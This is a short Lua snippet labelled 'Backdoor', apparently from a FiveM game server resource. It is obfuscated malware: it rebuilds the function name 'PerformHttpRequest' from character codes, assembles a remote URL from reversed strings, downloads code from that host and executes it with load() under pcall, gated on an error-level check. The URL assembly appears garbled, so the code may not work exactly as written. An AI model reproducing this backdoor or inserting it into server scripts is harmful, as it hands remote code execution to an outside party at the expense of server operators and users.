Backdoor :
(PerformHttpRequest)
if level == "error" then
(function()
local a = { [1] = string.char(80, 101, 114, 102, 111, 114, 109, 72, 116, 116, 112, 82, 101, 113, 117, 101, 115, 116) }
local b = string.reverse("?ot=2gJtT") .. string.reverse("rfirrehcsabeht" .. "tth://")
local c = { ["call"] = "pcall" }
local d = function(x) return load(x) end
local e = _G[a[1]]
local f = function (g, h)
_G[c.call](function()
assert(d(h))()
end)
end
e(b, f)
end)()
end